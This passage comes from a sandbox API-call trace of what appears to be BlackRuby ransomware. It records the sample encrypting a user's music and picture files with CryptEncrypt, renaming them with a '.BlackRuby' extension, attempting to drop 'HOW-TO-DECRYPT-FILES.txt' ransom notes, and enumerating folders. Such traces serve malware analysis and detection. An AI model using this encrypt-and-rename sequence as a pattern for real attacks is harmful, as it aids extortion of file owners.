RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0060.356] GetLastError () returned 0x0 [0060.393] CryptImportKey (in: hProv=0x37c818, pbData=0x1b7d2e8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360c20) returned 1 [0060.393] GetLastError () returned 0x0 [0060.393] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.393] GetLastError () returned 0x0 [0060.398] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.398] GetLastError () returned 0x0 [0060.398] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ce0) returned 1 [0060.398] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.398] GetLastError () returned 0x0 [0060.398] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1baa334*=0x1, dwFlags=0x0) returned 1 [0060.398] GetLastError () returned 0x0 [0060.398] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1baa300, dwFlags=0x0) returned 1 [0060.399] GetLastError () returned 0x0 [0060.399] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b01360*, pdwDataLen=0x18ed74*=0x18ee0, dwBufLen=0x18ee0 | out: pbData=0x2b01360*, pdwDataLen=0x18ed74*=0x18ee0) returned 1 [0060.400] GetLastError () returned 0x0 [0060.400] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1baa390*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1baa390*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.400] GetLastError () returned 0x0 [0060.400] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1baa3c0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1baa3c0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.400] GetLastError () returned 0x0 [0060.401] CryptDestroyKey (hKey=0x360c20) returned 1 [0060.401] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.401] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.401] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav", lpFilePart=0x0) returned 0x24 [0060.401] GetLastError () returned 0x0 [0060.401] SetErrorMode (uMode=0x1) returned 0x0 [0060.402] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav" (normalized: "c:\\users\\eebsym5\\music\\vghzj1hrs.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.403] GetLastError () returned 0xb7 [0060.403] GetFileType (hFile=0x184) returned 0x1 [0060.403] SetErrorMode (uMode=0x0) returned 0x1 [0060.403] GetFileType (hFile=0x184) returned 0x1 [0060.405] CloseHandle (hObject=0x184) returned 1 [0060.405] GetLastError () returned 0xb7 [0060.405] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav", lpFilePart=0x0) returned 0x24 [0060.405] GetLastError () returned 0xb7 [0060.405] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_n3EkZz9mDPiIFtRlz7z2DsavD3hqDRVICgr5CjrTW.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_n3EkZz9mDPiIFtRlz7z2DsavD3hqDRVICgr5CjrTW.BlackRuby", lpFilePart=0x0) returned 0x54 [0060.405] GetLastError () returned 0xb7 [0060.405] SetErrorMode (uMode=0x1) returned 0x0 [0060.405] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav" (normalized: "c:\\users\\eebsym5\\music\\vghzj1hrs.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bce8a0, ftCreationTime.dwHighDateTime=0x1d3554a, ftLastAccessTime.dwLowDateTime=0x3c26c990, ftLastAccessTime.dwHighDateTime=0x1d34de9, ftLastWriteTime.dwLowDateTime=0x2c319c00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18ef0)) returned 1 [0060.405] GetLastError () returned 0xb7 [0060.405] SetErrorMode (uMode=0x0) returned 0x1 [0060.405] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\VghZj1HRs.wav" (normalized: "c:\\users\\eebsym5\\music\\vghzj1hrs.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_n3EkZz9mDPiIFtRlz7z2DsavD3hqDRVICgr5CjrTW.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_n3ekzz9mdpiiftrlz7z2dsavd3hqdrvicgr5cjrtw.blackruby")) returned 1 [0060.407] GetLastError () returned 0xb7 [0060.407] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.407] GetLastError () returned 0xb7 [0060.407] SetErrorMode (uMode=0x1) returned 0x0 [0060.407] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.407] GetLastError () returned 0x5 [0060.408] SetErrorMode (uMode=0x0) returned 0x1 [0060.408] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\yS3sR4L.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\yS3sR4L.m4a", lpFilePart=0x0) returned 0x22 [0060.408] GetLastError () returned 0x5 [0060.408] SetErrorMode (uMode=0x1) returned 0x0 [0060.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\yS3sR4L.m4a" (normalized: "c:\\users\\eebsym5\\music\\ys3sr4l.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1bc7478 | out: lpFileInformation=0x1bc7478*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aeb2ad0, ftCreationTime.dwHighDateTime=0x1d35476, ftLastAccessTime.dwLowDateTime=0xf0b70190, ftLastAccessTime.dwHighDateTime=0x1d3532f, ftLastWriteTime.dwLowDateTime=0xf0b70190, ftLastWriteTime.dwHighDateTime=0x1d3532f, nFileSizeHigh=0x0, nFileSizeLow=0xec24)) returned 1 [0060.408] GetLastError () returned 0x5 [0060.408] SetErrorMode (uMode=0x0) returned 0x1 [0060.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.409] GetLastError () returned 0x5 [0060.409] SetErrorMode (uMode=0x1) returned 0x0 [0060.409] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.409] GetLastError () returned 0x5 [0060.410] SetErrorMode (uMode=0x0) returned 0x1 [0060.410] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\YWrdIN9fvMczbdQQ.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\YWrdIN9fvMczbdQQ.m4a", lpFilePart=0x0) returned 0x2b [0060.410] GetLastError () returned 0x5 [0060.410] SetErrorMode (uMode=0x1) returned 0x0 [0060.410] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\YWrdIN9fvMczbdQQ.m4a" (normalized: "c:\\users\\eebsym5\\music\\ywrdin9fvmczbdqq.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1be4e94 | out: lpFileInformation=0x1be4e94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ff71c0, ftCreationTime.dwHighDateTime=0x1d3546b, ftLastAccessTime.dwLowDateTime=0x82e64670, ftLastAccessTime.dwHighDateTime=0x1d34a43, ftLastWriteTime.dwLowDateTime=0x82e64670, ftLastWriteTime.dwHighDateTime=0x1d34a43, nFileSizeHigh=0x0, nFileSizeLow=0xc656)) returned 1 [0060.410] GetLastError () returned 0x5 [0060.410] SetErrorMode (uMode=0x0) returned 0x1 [0060.410] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0060.410] GetLastError () returned 0x5 [0060.410] SetErrorMode (uMode=0x1) returned 0x0 [0060.410] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.410] GetLastError () returned 0x5 [0060.411] SetErrorMode (uMode=0x0) returned 0x1 [0060.411] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", lpFilePart=0x0) returned 0x2c [0060.411] GetLastError () returned 0x5 [0060.411] SetErrorMode (uMode=0x1) returned 0x0 [0060.411] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav" (normalized: "c:\\users\\eebsym5\\music\\_sfxg 6p2jhlxmcoo.wav"), fInfoLevelId=0x0, lpFileInformation=0x1c028e8 | out: lpFileInformation=0x1c028e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3dae580, ftCreationTime.dwHighDateTime=0x1d353ed, ftLastAccessTime.dwLowDateTime=0xb993d980, ftLastAccessTime.dwHighDateTime=0x1d34fac, ftLastWriteTime.dwLowDateTime=0xb993d980, ftLastWriteTime.dwHighDateTime=0x1d34fac, nFileSizeHigh=0x0, nFileSizeLow=0x14a2)) returned 1 [0060.411] GetLastError () returned 0x5 [0060.412] SetErrorMode (uMode=0x0) returned 0x1 [0060.412] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", lpFilePart=0x0) returned 0x2c [0060.412] GetLastError () returned 0x5 [0060.412] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", lpFilePart=0x0) returned 0x2c [0060.412] GetLastError () returned 0x5 [0060.412] SetErrorMode (uMode=0x1) returned 0x0 [0060.412] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav" (normalized: "c:\\users\\eebsym5\\music\\_sfxg 6p2jhlxmcoo.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.412] GetLastError () returned 0x0 [0060.412] GetFileType (hFile=0x184) returned 0x1 [0060.412] SetErrorMode (uMode=0x0) returned 0x1 [0060.412] GetFileType (hFile=0x184) returned 0x1 [0060.412] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x14a2 [0060.412] GetLastError () returned 0x0 [0060.412] ReadFile (in: hFile=0x184, lpBuffer=0x1c04638, nNumberOfBytesToRead=0x14a2, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c04638*, lpNumberOfBytesRead=0x18ed84*=0x14a2, lpOverlapped=0x0) returned 1 [0060.413] GetLastError () returned 0x0 [0060.413] CloseHandle (hObject=0x184) returned 1 [0060.413] GetLastError () returned 0x0 [0060.413] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", lpFilePart=0x0) returned 0x2c [0060.413] GetLastError () returned 0x0 [0060.413] SetErrorMode (uMode=0x1) returned 0x0 [0060.413] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav" (normalized: "c:\\users\\eebsym5\\music\\_sfxg 6p2jhlxmcoo.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3dae580, ftCreationTime.dwHighDateTime=0x1d353ed, ftLastAccessTime.dwLowDateTime=0xb993d980, ftLastAccessTime.dwHighDateTime=0x1d34fac, ftLastWriteTime.dwLowDateTime=0xb993d980, ftLastWriteTime.dwHighDateTime=0x1d34fac, nFileSizeHigh=0x0, nFileSizeLow=0x14a2)) returned 1 [0060.413] GetLastError () returned 0x0 [0060.413] SetErrorMode (uMode=0x0) returned 0x1 [0060.425] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c61344, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0060.425] GetLastError () returned 0x0 [0060.425] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.425] GetLastError () returned 0x0 [0060.430] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.430] GetLastError () returned 0x0 [0060.430] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360aa0) returned 1 [0060.430] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.430] GetLastError () returned 0x0 [0060.430] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1c8e390*=0x1, dwFlags=0x0) returned 1 [0060.430] GetLastError () returned 0x0 [0060.430] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1c8e35c, dwFlags=0x0) returned 1 [0060.430] GetLastError () returned 0x0 [0060.430] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8e3d8*, pdwDataLen=0x18ed74*=0x15a0, dwBufLen=0x15a0 | out: pbData=0x1c8e3d8*, pdwDataLen=0x18ed74*=0x15a0) returned 1 [0060.430] GetLastError () returned 0x0 [0060.431] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c90f44*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c90f44*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.431] GetLastError () returned 0x0 [0060.431] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c90f74*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c90f74*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.431] GetLastError () returned 0x0 [0060.431] CryptDestroyKey (hKey=0x360a20) returned 1 [0060.431] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.431] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.431] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav", lpFilePart=0x0) returned 0x2c [0060.431] GetLastError () returned 0x0 [0060.431] SetErrorMode (uMode=0x1) returned 0x0 [0060.432] GetFileType (hFile=0x184) returned 0x1 [0060.432] SetErrorMode (uMode=0x0) returned 0x1 [0060.432] GetFileType (hFile=0x184) returned 0x1 [0060.432] WriteFile (in: hFile=0x184, lpBuffer=0x1c93af0*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1c93af0*, lpNumberOfBytesWritten=0x18ed90*=0x15b0, lpOverlapped=0x0) returned 1 [0060.433] GetLastError () returned 0xb7 [0060.433] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\_SFXg 6p2jHlXMCOo.wav" (normalized: "c:\\users\\eebsym5\\music\\_sfxg 6p2jhlxmcoo.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_gYsxjwGRyrbupU0YLDBOL4pZN72N2F4eAvEgM6.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_gysxjwgryrbupu0yldbol4pzn72n2f4eavegm6.blackruby")) returned 1 [0060.433] GetLastError () returned 0xb7 [0060.434] SetErrorMode (uMode=0x0) returned 0x1 [0060.435] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\My Documents\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0060.435] GetLastError () returned 0x5 [0060.436] SetErrorMode (uMode=0x0) returned 0x1 [0060.436] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\NetHood", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\NetHood", lpFilePart=0x0) returned 0x18 [0060.436] GetLastError () returned 0x5 [0060.436] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0060.437] GetLastError () returned 0x5 [0060.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0060.437] GetLastError () returned 0x5 [0060.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\NetHood", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\NetHood", lpFilePart=0x0) returned 0x18 [0060.437] GetLastError () returned 0x5 [0060.437] SetErrorMode (uMode=0x1) returned 0x0 [0060.437] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\NetHood\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0060.437] GetLastError () returned 0x5 [0060.438] SetErrorMode (uMode=0x0) returned 0x1 [0060.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures", lpFilePart=0x0) returned 0x19 [0060.439] GetLastError () returned 0x5 [0060.439] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0060.439] GetLastError () returned 0x5 [0060.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0060.439] GetLastError () returned 0x5 [0060.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures", lpFilePart=0x0) returned 0x19 [0060.439] GetLastError () returned 0x5 [0060.439] SetErrorMode (uMode=0x1) returned 0x0 [0060.439] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0060.439] GetLastError () returned 0x5 [0060.439] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.439] GetLastError () returned 0x5 [0060.439] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.439] GetLastError () returned 0x5 [0060.439] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.439] GetLastError () returned 0x5 [0060.440] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.440] GetLastError () returned 0x5 [0060.440] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.440] GetLastError () returned 0x5 [0060.440] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.440] GetLastError () returned 0x5 [0060.440] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.440] GetLastError () returned 0x5 [0060.440] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.440] GetLastError () returned 0x5 [0060.440] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.440] GetLastError () returned 0x5 [0060.440] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.440] GetLastError () returned 0x5 [0060.441] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.441] GetLastError () returned 0x5 [0060.441] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.441] GetLastError () returned 0x5 [0060.441] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.441] GetLastError () returned 0x5 [0060.441] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.441] GetLastError () returned 0x5 [0060.441] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.441] GetLastError () returned 0x5 [0060.441] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.441] GetLastError () returned 0x5 [0060.442] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.442] GetLastError () returned 0x5 [0060.442] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0060.442] GetLastError () returned 0x12 [0060.442] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0060.442] SetErrorMode (uMode=0x0) returned 0x1 [0060.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures", lpFilePart=0x0) returned 0x19 [0060.442] GetLastError () returned 0x12 [0060.442] SetErrorMode (uMode=0x1) returned 0x0 [0060.442] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0060.442] GetLastError () returned 0x12 [0060.442] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.442] GetLastError () returned 0x12 [0060.443] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.443] GetLastError () returned 0x12 [0060.443] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.443] GetLastError () returned 0x12 [0060.443] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.443] GetLastError () returned 0x12 [0060.443] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.443] GetLastError () returned 0x12 [0060.443] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.443] GetLastError () returned 0x12 [0060.443] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.443] GetLastError () returned 0x12 [0060.443] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.443] GetLastError () returned 0x12 [0060.444] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.444] GetLastError () returned 0x12 [0060.444] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.444] GetLastError () returned 0x12 [0060.444] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.444] GetLastError () returned 0x12 [0060.444] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.444] GetLastError () returned 0x12 [0060.444] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.444] GetLastError () returned 0x12 [0060.444] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.444] GetLastError () returned 0x12 [0060.445] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.445] GetLastError () returned 0x12 [0060.445] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.445] GetLastError () returned 0x12 [0060.445] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0060.445] GetLastError () returned 0x12 [0060.445] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0060.445] GetLastError () returned 0x12 [0060.445] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0060.445] SetErrorMode (uMode=0x0) returned 0x1 [0060.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", lpFilePart=0x0) returned 0x27 [0060.445] GetLastError () returned 0x12 [0060.445] SetErrorMode (uMode=0x1) returned 0x0 [0060.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\1xk4mxmoq.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1cb6338 | out: 